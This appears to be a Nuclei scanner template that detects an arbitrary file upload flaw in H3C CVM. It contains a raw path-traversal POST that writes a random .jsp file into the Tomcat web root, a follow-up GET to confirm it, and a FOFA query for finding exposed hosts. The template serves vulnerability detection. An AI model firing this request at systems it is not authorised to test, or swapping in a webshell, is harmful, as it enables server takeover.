nuclei-templates/http/vulnerabilities/other/h3c-cvm-arbitrary-file-uplo...

51 lines
1.4 KiB
YAML
Raw Normal View History

2023-08-21 03:00:47 +00:00
id: h3c-cvm-arbitrary-file-upload
info:
name: H3C CVM - Arbitrary File Upload
author: SleepingBag945
severity: critical
description: |
An H3C CVM vulnerability allows for arbitrary file uploads. This enables attackers to upload any files they choose, acquire webshells, manipulate server permissions, and access sensitive information.
2023-08-21 03:00:47 +00:00
reference:
- https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/h3c-cvm-fileupload.yaml
2023-08-21 06:07:14 +00:00
- https://github.com/tr0uble-mAker/POC-bomber/blob/main/pocs/redteam/h3c_cvm_fileupload_2022.py
2023-08-21 03:00:47 +00:00
metadata:
max-request: 2
verified: true
fofa-query: server="H3C-CVM"
2023-08-21 06:09:07 +00:00
tags: h3c,lfi,instrusive,file-upload
2023-08-21 03:00:47 +00:00
variables:
2023-08-21 06:07:14 +00:00
filename: "{{rand_base(5)}}"
payload: "{{rand_base(8)}}"
2023-08-21 03:00:47 +00:00
http:
- raw:
- |
2023-08-21 06:07:14 +00:00
POST /cas/fileUpload/upload?token=/../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/{{filename}}.jsp&name=222" HTTP/1.1
2023-08-21 03:00:47 +00:00
Host: {{Hostname}}
Content-range: bytes 0-10/20
Accept-Encoding: gzip, deflate
2023-08-21 06:07:14 +00:00
{{payload}}
2023-08-21 03:00:47 +00:00
- |
2023-08-21 06:07:14 +00:00
GET /cas/js/lib/buttons/{{filename}}.jsp HTTP/1.1
2023-08-21 03:00:47 +00:00
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
2023-08-21 06:07:14 +00:00
part: body_2
2023-08-21 03:00:47 +00:00
words:
2023-08-21 06:07:14 +00:00
- "{{payload}}"
2023-08-21 03:00:47 +00:00
- type: word
part: header
words:
- "Content-Type: text/html"
- type: status
status:
2023-08-21 03:08:07 +00:00
- 200